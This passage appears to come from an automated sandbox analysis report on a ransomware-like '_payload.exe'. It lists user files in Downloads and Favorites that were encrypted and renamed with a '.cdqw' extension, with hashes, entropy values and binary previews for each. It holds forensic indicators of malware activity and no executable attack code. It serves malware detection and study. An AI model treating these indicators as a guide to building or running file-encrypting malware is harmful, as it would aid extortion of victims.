                                                                                                                                                                      Entropy (8bit):7.859478581840915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3m1ikU3hT3Zmo1dl4hxuSXWzY38RCHkYXpFuWT2d3LE2dPPgQUg2bD:3EikINZRKxX8R9YdTMbEzQYD
                                                                                                                                                                      MD5:F5290687650E3AE616263E1AA4FAD2BE
                                                                                                                                                                      SHA1:A73DAEEC1E69B334AEFC59010EE731708C769817
                                                                                                                                                                      SHA-256:31CEDB613BEAC7C586DD6B43413D11641594635541FA561A5EC39DC5E3742412
                                                                                                                                                                      SHA-512:957A56E59D9429300A3D2C254E18700C9DF15AD8E9451B3DC70EFCC1DCAF1EEFD0D66C5A8DA3BD905AF174820C1A67B6335DE9F45C8BC491EFFB1546D9ECD925
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ!..X.$..c'.J:H....$...A..u..0........Fo.Q..:U.DK .?I.#.i.Kj.. .d......"h..U"J....O......:.oA.5....G'...uM).v..h.~c .....7./.......m\"...J.hl...H..C...V.d."4j.J..U..h<..+Ir.#.|vj2..!8.%5...4..`.$.~.]...%.....W.V.=p.!g...aF....rZ+.@..>...Q.\..Hh.$....LY...P..c.-Y..\..&.*..}....G"..b..|...-..<`...%.%...."..:.4........uz3vt.r%^.?....5^O.@D.6g...._......i.pG..(.gbj@O.g%y..u..4.{947f....@..Os.]....1}#^N.N.).E)...A..._..R.m;...b.....g;..^..9....@..".~9.....J.s;q..$...."_nzi.}....Ud.H.....,r....H.a..:...X.CP#k.....@........NL<N...D)....U.j......T.........I_.^...R..........f..:\.0.I@.m.M....V.L.`..2.w.)....J...=...Q..^.. .%..A]:..~...j[...S....Gu...z.^..Y....~.IY..............m.w.....v....L.Tpx.~....;.w.1..~R.9.....FG..:.I. .U..Kg.oj^.yb...H...w..)h.V..,.{.....:".....O;..V_^..#..-I..C`..m....Ce..a..<.1.,"Y@.0..p....P........J.j..3K..Y.>.:M.b.1.k..5.%.FE.............t.k..4=/.f.c.R.^.Pv|!.f......5*...hWm.)./tfH51sc.IT1......p...K:.7

                                                                                                                                                                      C:\Users\user\Downloads\ONBQCLYSPU.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835969035459328
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pfEBtc6X5/Kx8+jlRI71y85D4xWebkqaHz/MZTLOg132bD:Icu5e8+QpXDabk7AZTLPSD
                                                                                                                                                                      MD5:75059CE8A88FCA1F25196A96222FD1CA
                                                                                                                                                                      SHA1:B94421D0DCCEFAFE830F989A839B268ACDF19577
                                                                                                                                                                      SHA-256:965ADF059A29DFF2718CE4C01FB799B1A76FA725A4B924A4596856227B508C3A
                                                                                                                                                                      SHA-512:B33AB75E956BAAB2BDFAB1389015B0520D6F1B85A7256DF3851A5B0899B533878E6B9855DA9D42CBCA35E3415603A8C5ACF3CCCB17A41DAF81F38DFFCA3FBACF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC/.!.hI..Y..0b..0.~.=.Aw.1,...:9..p.._=..........R.i../8i.~..{b.j.?"t...t..'{.@....-G..&.'5Dk.<ju..1C...Q.N"..R......@..X.F.M.|.X..s.\*._IG..........Ja...d.u.[.].Fp.Qp.@4"..5.@|k...{...1b....<pQ8..+...;...*...d.x}.m.,.e.@.A..E....a.).@H.-a. x.I.3U.....z....0...uzV..:..|(qK...V)......3@....'.i.:.?...n........U...s.....a.e.*-.;c......p.V...+jN...=....5....X.K4} ..).9X.D.....q,...........+..[......E.b.U...$..k...s.....(........!....sl.....Y....".......L.<......q..N.EJ...o4.'.....f.x...92.A.F7/W.G,'F8(.?.7...:a..]......[?3...D....J[...1..L&"..<w.}.?oV.Qs..d_.a.rb..|....Ha..~.N1L.l.........VqS.. ^...6`.5..A...}.uK1_....t.NR0Ynk7.._..?5.._..yD.~.{Q.}\F.:..*u..`..V.f.HT<.n}=7c...KY....{..V......Ag..J....h...o....M...}Z...`.&......>.L|<...3\z.........lp..X.e.\..Ox..9EA...rd.'R ror....t=.X....a.t|c..a.~...i..*./.......mp..r...<.{.~.SM.De$.r+..w..(}.Vk.?.....tK...gG.B..A4.C.6].+T..R.b....:.....BZR.....T.c#b...g.3....Ps.#.n..op.].9..V.!=....i.K8.

                                                                                                                                                                      C:\Users\user\Downloads\ONBQCLYSPU.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.835969035459328
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pfEBtc6X5/Kx8+jlRI71y85D4xWebkqaHz/MZTLOg132bD:Icu5e8+QpXDabk7AZTLPSD
                                                                                                                                                                      MD5:75059CE8A88FCA1F25196A96222FD1CA
                                                                                                                                                                      SHA1:B94421D0DCCEFAFE830F989A839B268ACDF19577
                                                                                                                                                                      SHA-256:965ADF059A29DFF2718CE4C01FB799B1A76FA725A4B924A4596856227B508C3A
                                                                                                                                                                      SHA-512:B33AB75E956BAAB2BDFAB1389015B0520D6F1B85A7256DF3851A5B0899B533878E6B9855DA9D42CBCA35E3415603A8C5ACF3CCCB17A41DAF81F38DFFCA3FBACF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:ONBQC/.!.hI..Y..0b..0.~.=.Aw.1,...:9..p.._=..........R.i../8i.~..{b.j.?"t...t..'{.@....-G..&.'5Dk.<ju..1C...Q.N"..R......@..X.F.M.|.X..s.\*._IG..........Ja...d.u.[.].Fp.Qp.@4"..5.@|k...{...1b....<pQ8..+...;...*...d.x}.m.,.e.@.A..E....a.).@H.-a. x.I.3U.....z....0...uzV..:..|(qK...V)......3@....'.i.:.?...n........U...s.....a.e.*-.;c......p.V...+jN...=....5....X.K4} ..).9X.D.....q,...........+..[......E.b.U...$..k...s.....(........!....sl.....Y....".......L.<......q..N.EJ...o4.'.....f.x...92.A.F7/W.G,'F8(.?.7...:a..]......[?3...D....J[...1..L&"..<w.}.?oV.Qs..d_.a.rb..|....Ha..~.N1L.l.........VqS.. ^...6`.5..A...}.uK1_....t.NR0Ynk7.._..?5.._..yD.~.{Q.}\F.:..*u..`..V.f.HT<.n}=7c...KY....{..V......Ag..J....h...o....M...}Z...`.&......>.L|<...3\z.........lp..X.e.\..Ox..9EA...rd.'R ror....t=.X....a.t|c..a.~...i..*./.......mp..r...<.{.~.SM.De$.r+..w..(}.Vk.?.....tK...gG.B..A4.C.6].+T..R.b....:.....BZR.....T.c#b...g.3....Ps.#.n..op.].9..V.!=....i.K8.

                                                                                                                                                                      C:\Users\user\Downloads\UMMBDNEQBN.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853155453209964
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aN5A7ryZ2pGbTay6KEmGhd+TMNEvpGXxcPjjsALVvlwEIAyzS0aXoqFZ6tqL2bD:a/A7+2E/jQvBNmGKPj4AnwSyz0oqeq4D
                                                                                                                                                                      MD5:3B63254DF495D8232ADEE7AFE712896D
                                                                                                                                                                      SHA1:55A9E394ACF7B8A12AF071CEE0D2AD913D01B906
                                                                                                                                                                      SHA-256:4150A41304B6831892BD7469B60040929214BA829A2F0B610EC65DD0CE1D185C
                                                                                                                                                                      SHA-512:6CE90ECAC866868ABBBCFAED1188A3DF3A0B6529E8B41A7C3FA7571D9F3A370A6F011D2E8139383D194CB8945E07A6E2C1F9777263B17AECABC3651678190069
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD...y.G.NV7Q...go.+....S..xu...I.h'....LN]{4s.UB%./..3.}V.u.&j..j....%C&.Fq..v.D.L...-zB.....`.TK...lm...,...=y....VD.c .v...8...#...qHE.r.x...e...b......7>x..?r*..k.z.....v,5`.w.K..Js:?e..6l..........v.k.l..l...r..{.=.{6......G...s...)......;.#..BE.=.4Gd...\.t....86*4.4vxr.T$i..>Kc.Q..-.e....*.1...c.%.'=e.....5.....gly...k.],..@..=.R..I.W..KzS..8[.H.."T+..T..l..]..V..K....=...#..WA.....w}....c...Q.`O<......p...:../T...6.4.*...ZH.....M..+K.......^.5.|....q..m...>.Y.3.....OP.m...r.Wo.P[eW..pr_........aK._../.P.......H..V,.....2].:.5R......l.8aztN.].U...jk.a..<...vcd.V~..J..`..a...!..%..........8....4.iej...4....O.G.F.VQ...J)sX..w.x..%{.......r.?cR...m.&..' a4;.Z....!.hv.h...l.em.jOA{.........-.B..z..[.sl.2.....E".L.f.d...y.*".v...a..=.<.h.!..g..g.y.............eY.S.K.......]=..o..........t).&r)PEt.3....j..7.fI.r.K.V..H.....B\-.[...!.3.....|g.........83...T...T.>.=.|.Lw._.;..M.@..`.p..0e .G..i5.....G.....o'...l...%d.&i.<qE<3=......O..!

                                                                                                                                                                      C:\Users\user\Downloads\UMMBDNEQBN.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.853155453209964
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aN5A7ryZ2pGbTay6KEmGhd+TMNEvpGXxcPjjsALVvlwEIAyzS0aXoqFZ6tqL2bD:a/A7+2E/jQvBNmGKPj4AnwSyz0oqeq4D
                                                                                                                                                                      MD5:3B63254DF495D8232ADEE7AFE712896D
                                                                                                                                                                      SHA1:55A9E394ACF7B8A12AF071CEE0D2AD913D01B906
                                                                                                                                                                      SHA-256:4150A41304B6831892BD7469B60040929214BA829A2F0B610EC65DD0CE1D185C
                                                                                                                                                                      SHA-512:6CE90ECAC866868ABBBCFAED1188A3DF3A0B6529E8B41A7C3FA7571D9F3A370A6F011D2E8139383D194CB8945E07A6E2C1F9777263B17AECABC3651678190069
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD...y.G.NV7Q...go.+....S..xu...I.h'....LN]{4s.UB%./..3.}V.u.&j..j....%C&.Fq..v.D.L...-zB.....`.TK...lm...,...=y....VD.c .v...8...#...qHE.r.x...e...b......7>x..?r*..k.z.....v,5`.w.K..Js:?e..6l..........v.k.l..l...r..{.=.{6......G...s...)......;.#..BE.=.4Gd...\.t....86*4.4vxr.T$i..>Kc.Q..-.e....*.1...c.%.'=e.....5.....gly...k.],..@..=.R..I.W..KzS..8[.H.."T+..T..l..]..V..K....=...#..WA.....w}....c...Q.`O<......p...:../T...6.4.*...ZH.....M..+K.......^.5.|....q..m...>.Y.3.....OP.m...r.Wo.P[eW..pr_........aK._../.P.......H..V,.....2].:.5R......l.8aztN.].U...jk.a..<...vcd.V~..J..`..a...!..%..........8....4.iej...4....O.G.F.VQ...J)sX..w.x..%{.......r.?cR...m.&..' a4;.Z....!.hv.h...l.em.jOA{.........-.B..z..[.sl.2.....E".L.f.d...y.*".v...a..=.<.h.!..g..g.y.............eY.S.K.......]=..o..........t).&r)PEt.3....j..7.fI.r.K.V..H.....B\-.[...!.3.....|g.........83...T...T.>.=.|.Lw._.;..M.@..`.p..0e .G..i5.....G.....o'...l...%d.&i.<qE<3=......O..!

                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843848549990665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c1yf5Y1aUTsxPBw+wPMLbgPgQtz+Lt0Wp8TrYuNutJWk9kYrKs4cDpHseZWYi2bD:c1yRY1VYxPa+wP0gJz3xQuU974ceeIYx
                                                                                                                                                                      MD5:87DF4E4FA10786915B41B9D8E44E58D5
                                                                                                                                                                      SHA1:B2685B7AECDE8B46DAE5852C64C746F44A58542C
                                                                                                                                                                      SHA-256:146593341722D7DC6915CEAE50EBCCF0554C72154E61072558B6D2A38B837EC2
                                                                                                                                                                      SHA-512:470C7CA4BB484F72603D18CD938BE1B33D6DB4378546696FB63F05E79D18F47714CC9F4E3B8849D84DD82CF06BFE682803D0F3F2EB09FA94DE9BF86608CC8340
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UOOJJ....y5.....N.<...ZH........3...-.q...t..M....n...^O.Sp.....qo....P..mR.....t.........!._-{.....jr.#<.....J."..-9...\n.3.N....w`.:.;..Q_...j......;@wo.0_.4..uy..<|...)..0..i...|.U.L.%..K.....Dc.%.kF6@e.K....}..H.......f.o`2B....~.f..$s..npD.'&.A.4:.....gt1....@..`Rx0O...LGSzc3G.......X...V..#.].}..x..b.?.!.p...].Yt.(>.`S1...{..m.V.....emL....%..:.2.....nIp[.A.Pz2.......7.XJ...n..a@A/&...u0..J<4...T'..}.>i.>...B{........\..x.U....p.U.78...!#.v6..<..........m.T....X!....../.@.v..JB.{`Pe........+.).a=...9q...q.<...78..J..:..'w....]..._.).>../..w`..$....7...q5...Tb..A..........bV....U..s nYm.....o.T.xj...7..#.+..G%..B..m.(B<...Mn@.0..~..$8....&C...=..h`...ln..}2...$.v8#.1.B.5.y.8;c...wr...~...D..\|............,.&x..71n.2.].-t.`..fx....k{h._]...M.,N.'....bY.....[.W....h6d....j..?>..K.+.....hq....Z#..w..g.[P',".=A...8>.e..ts)..dR(.........SF..Q.i?Q..{...~4....O%......HX{...[......)Y5..M\..V}.O.....Y.....9.....<..s....Lw..l..6..pd..9M.8o.?...

                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.843848549990665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:c1yf5Y1aUTsxPBw+wPMLbgPgQtz+Lt0Wp8TrYuNutJWk9kYrKs4cDpHseZWYi2bD:c1yRY1VYxPa+wP0gJz3xQuU974ceeIYx
                                                                                                                                                                      MD5:87DF4E4FA10786915B41B9D8E44E58D5
                                                                                                                                                                      SHA1:B2685B7AECDE8B46DAE5852C64C746F44A58542C
                                                                                                                                                                      SHA-256:146593341722D7DC6915CEAE50EBCCF0554C72154E61072558B6D2A38B837EC2
                                                                                                                                                                      SHA-512:470C7CA4BB484F72603D18CD938BE1B33D6DB4378546696FB63F05E79D18F47714CC9F4E3B8849D84DD82CF06BFE682803D0F3F2EB09FA94DE9BF86608CC8340
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UOOJJ....y5.....N.<...ZH........3...-.q...t..M....n...^O.Sp.....qo....P..mR.....t.........!._-{.....jr.#<.....J."..-9...\n.3.N....w`.:.;..Q_...j......;@wo.0_.4..uy..<|...)..0..i...|.U.L.%..K.....Dc.%.kF6@e.K....}..H.......f.o`2B....~.f..$s..npD.'&.A.4:.....gt1....@..`Rx0O...LGSzc3G.......X...V..#.].}..x..b.?.!.p...].Yt.(>.`S1...{..m.V.....emL....%..:.2.....nIp[.A.Pz2.......7.XJ...n..a@A/&...u0..J<4...T'..}.>i.>...B{........\..x.U....p.U.78...!#.v6..<..........m.T....X!....../.@.v..JB.{`Pe........+.).a=...9q...q.<...78..J..:..'w....]..._.).>../..w`..$....7...q5...Tb..A..........bV....U..s nYm.....o.T.xj...7..#.+..G%..B..m.(B<...Mn@.0..~..$8....&C...=..h`...ln..}2...$.v8#.1.B.5.y.8;c...wr...~...D..\|............,.&x..71n.2.].-t.`..fx....k{h._]...M.,N.'....bY.....[.W....h6d....j..?>..K.+.....hq....Z#..w..g.[P',".=A...8>.e..ts)..dR(.........SF..Q.i?Q..{...~4....O%......HX{...[......)Y5..M\..V}.O.....Y.....9.....<..s....Lw..l..6..pd..9M.8o.?...

                                                                                                                                                                      C:\Users\user\Downloads\XZXHAVGRAG.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85702608810116
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RNFzO2fKMZPBX+xESwMEpj6nxl/RfMMuIZbaPLErSXR+iwxt2bD:hO2h+2pcdRfMMuI0zViGD
                                                                                                                                                                      MD5:03EA841CF251516EB1D6ECFBB61B783C
                                                                                                                                                                      SHA1:DDA8A11321B8974C30EF46D1264D6D08CF5FC34E
                                                                                                                                                                      SHA-256:6F5568E7445846DBA21F57A3CFA7064F5491BF1C6DBC57E1278DF998323EB8BE
                                                                                                                                                                      SHA-512:6C15C1F0AA5066A91547909B273E59525D69063351B6F6D99496A0904F6BFBAA22E9BEA8CFEA0C481CA554BBF2EBCB511787250B25AC7BA6BCAAE8F6E1DF83E5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..\..D.....Q.^-{.0X...h(..J.....]...?0\.....D.X.....}0..e.Y....qm).|:...;..t.{.ccm.ng'|m....8.&d...p...v9~...3m.. b.`8 (...p..l..n$...5....P..../. .`._.....'... .#.......8....T..$.....r.........ax./.3.3.t7......!!..($..iS=..b.i.[..j............_V.{..?4.?.]....{.5....%..f..2S...2...0&e.a......?....jN\...a.-s$.>As...rH...0.S.*M....r>S.H..A..v:.{....j.....v0..c...}ai..9...g..E............`.T>:{.OP..eN>..x.`~$..|..^...=5.l..........L|&.#e9.0&....X..`...Q.d.3i.xm..S...a.O...d..z?3N..dg_d...L*..A."g...).L9...1N..K$.....m..".m....8...K..].6'M..,.Y......,J>{..t.Y.,...3.8..Y=..2...1y.Gc.J ..=l[>.......'.o/.H...|.N....).=.....SC....c....'.6.;.cL.@.......+....<..s.Vfv..,.....S!.;<.y.xm....,...9|.U.\..k....}..)2.,....._....}..&.yy.....`=D.fA......6..5j.....h~......,.=...~9G.g~a......MP.9.r......{\...&.*._rNu.&.....B...'...,p.'...y.,.".dh..D..4..)nw.f...jz.(...l...A.4_..K....G....r...v..6S....$......4..8%.;.JDf.r..7|...="...F.4k.}M@K.}7...%.#

                                                                                                                                                                      C:\Users\user\Downloads\XZXHAVGRAG.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85702608810116
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RNFzO2fKMZPBX+xESwMEpj6nxl/RfMMuIZbaPLErSXR+iwxt2bD:hO2h+2pcdRfMMuI0zViGD
                                                                                                                                                                      MD5:03EA841CF251516EB1D6ECFBB61B783C
                                                                                                                                                                      SHA1:DDA8A11321B8974C30EF46D1264D6D08CF5FC34E
                                                                                                                                                                      SHA-256:6F5568E7445846DBA21F57A3CFA7064F5491BF1C6DBC57E1278DF998323EB8BE
                                                                                                                                                                      SHA-512:6C15C1F0AA5066A91547909B273E59525D69063351B6F6D99496A0904F6BFBAA22E9BEA8CFEA0C481CA554BBF2EBCB511787250B25AC7BA6BCAAE8F6E1DF83E5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..\..D.....Q.^-{.0X...h(..J.....]...?0\.....D.X.....}0..e.Y....qm).|:...;..t.{.ccm.ng'|m....8.&d...p...v9~...3m.. b.`8 (...p..l..n$...5....P..../. .`._.....'... .#.......8....T..$.....r.........ax./.3.3.t7......!!..($..iS=..b.i.[..j............_V.{..?4.?.]....{.5....%..f..2S...2...0&e.a......?....jN\...a.-s$.>As...rH...0.S.*M....r>S.H..A..v:.{....j.....v0..c...}ai..9...g..E............`.T>:{.OP..eN>..x.`~$..|..^...=5.l..........L|&.#e9.0&....X..`...Q.d.3i.xm..S...a.O...d..z?3N..dg_d...L*..A."g...).L9...1N..K$.....m..".m....8...K..].6'M..,.Y......,J>{..t.Y.,...3.8..Y=..2...1y.Gc.J ..=l[>.......'.o/.H...|.N....).=.....SC....c....'.6.;.cL.@.......+....<..s.Vfv..,.....S!.;<.y.xm....,...9|.U.\..k....}..)2.,....._....}..&.yy.....`=D.fA......6..5j.....h~......,.=...~9G.g~a......MP.9.r......{\...&.*._rNu.&.....B...'...,p.'...y.,.".dh..D..4..)nw.f...jz.(...l...A.4_..K....G....r...v..6S....$......4..8%.;.JDf.r..7|...="...F.4k.}M@K.}7...%.#

                                                                                                                                                                      C:\Users\user\Favorites\Bing.url

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):542
                                                                                                                                                                      Entropy (8bit):7.514552319753495
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mPBpCA9YqJdqEClCVKH2jZr6gGJ38lTQKhqsFRp0aWSUdNcii9a:mPBp19Y7Nl9H2jZr6FJM9hqsF/0o2bD
                                                                                                                                                                      MD5:6C129121F23A2AB0FF85F746EAA15C6A
                                                                                                                                                                      SHA1:49667766B286687F91EF2188314C9CB5CC7D71BF
                                                                                                                                                                      SHA-256:C994ED70C1A5C2EEE2A4044B8F004A06D988AE4233D7BE2BBE5DAE29ED4ECBD4
                                                                                                                                                                      SHA-512:20FCFE2664B003CDFB92FFE5AC134C4B777D9B253622F0EBEFE3B419308A0782989CF6656BDD389EA9325E7F250D17FFBC2EBF92EA36E8A8A6BB2DD0D1E58342
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000...j.^.."./.a<^z.....b[.7..r.%..W`..k..x.}...m..j....+..lr:....O.F.$...f3E.V..8..-.L.....\.kW...^....N.Oc.F...=<_?S......,.:...d.(.Ok%.=R..q.cKtx{......Y.6w6........n(R.....;.G.D..M).N.=..`...*.9y.....i.-5.....TQ.TL.iU.56.94.M/?.........).........8..K...R....4x...lx5....._w)...>........j...q5.;...D.Y..ZS&.Cr..`.[`.sRl..+0.R..V...{.dDRY...u...A..........e..f.N...=~...n..t..^...x.O..[..e.S....,..5.7.U.j..V}3.HjM^.?..z..C".yEd.m.IC.!\3_..I.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Bing.url.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):542
                                                                                                                                                                      Entropy (8bit):7.514552319753495
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mPBpCA9YqJdqEClCVKH2jZr6gGJ38lTQKhqsFRp0aWSUdNcii9a:mPBp19Y7Nl9H2jZr6FJM9hqsF/0o2bD
                                                                                                                                                                      MD5:6C129121F23A2AB0FF85F746EAA15C6A
                                                                                                                                                                      SHA1:49667766B286687F91EF2188314C9CB5CC7D71BF
                                                                                                                                                                      SHA-256:C994ED70C1A5C2EEE2A4044B8F004A06D988AE4233D7BE2BBE5DAE29ED4ECBD4
                                                                                                                                                                      SHA-512:20FCFE2664B003CDFB92FFE5AC134C4B777D9B253622F0EBEFE3B419308A0782989CF6656BDD389EA9325E7F250D17FFBC2EBF92EA36E8A8A6BB2DD0D1E58342
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000...j.^.."./.a<^z.....b[.7..r.%..W`..k..x.}...m..j....+..lr:....O.F.$...f3E.V..8..-.L.....\.kW...^....N.Oc.F...=<_?S......,.:...d.(.Ok%.=R..q.cKtx{......Y.6w6........n(R.....;.G.D..M).N.=..`...*.9y.....i.-5.....TQ.TL.iU.56.94.M/?.........).........8..K...R....4x...lx5....._w)...>........j...q5.;...D.Y..ZS&.Cr..`.[`.sRl..+0.R..V...{.dDRY...u...A..........e..f.N...=~...n..t..^...x.O..[..e.S....,..5.7.U.j..V}3.HjM^.?..z..C".yEd.m.IC.!\3_..I.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Google.url

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                      Entropy (8bit):7.536025459553159
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:D0XuGoO5FyeENDsh09+GgWGySkSUdNcii9a:gXua5FONDsC9+Gjre2bD
                                                                                                                                                                      MD5:961B481B3DE491C924AC880B67AA0B19
                                                                                                                                                                      SHA1:196E58EE236A8CC2034174F5B4026D6986B0048E
                                                                                                                                                                      SHA-256:FCB2EB5B0DA7414412BCD980B34A01025158C64C27F030C383BBC28956DFDEF0
                                                                                                                                                                      SHA-512:3C21EC04EFA9F5339AC81E913D9C013DA9D62DA6D559D4E277D830E6BF6C313880DDFD35A2E20069FBF41AEADDCD89F7D032B7379F07965FCECACCE96ADB5B94
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[{000,...H..~..@....SW...g..0.d.t|&...&(..](..w..........t.?.r2'..W^.../.Ot.(......AT....K.o'..m......*$.[}.P.......5V.&)...3......>.....n..%p.{.|....;........Y.l.v.....f.=....$3..u................L....E.}p.vl.Df.R..[.8.F..i._..U..e..b....J5Z...V..k...".....s.YMhK.0 S.2G.........].jT..;...:.1.#.hC2N.......e.$..g.T.A5.0).....x..\!Zi.Z-...kw#.dGX.5QK...k.W.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\Favorites\Google.url.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                      Entropy (8bit):7.536025459553159
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:D0XuGoO5FyeENDsh09+GgWGySkSUdNcii9a:gXua5FONDsC9+Gjre2bD
                                                                                                                                                                      MD5:961B481B3DE491C924AC880B67AA0B19
                                                                                                                                                                      SHA1:196E58EE236A8CC2034174F5B4026D6986B0048E
                                                                                                                                                                      SHA-256:FCB2EB5B0DA7414412BCD980B34A01025158C64C27F030C383BBC28956DFDEF0
                                                                                                                                                                      SHA-512:3C21EC04EFA9F5339AC81E913D9C013DA9D62DA6D559D4E277D830E6BF6C313880DDFD35A2E20069FBF41AEADDCD89F7D032B7379F07965FCECACCE96ADB5B94
                                                                                                                                                                      Malicious:false
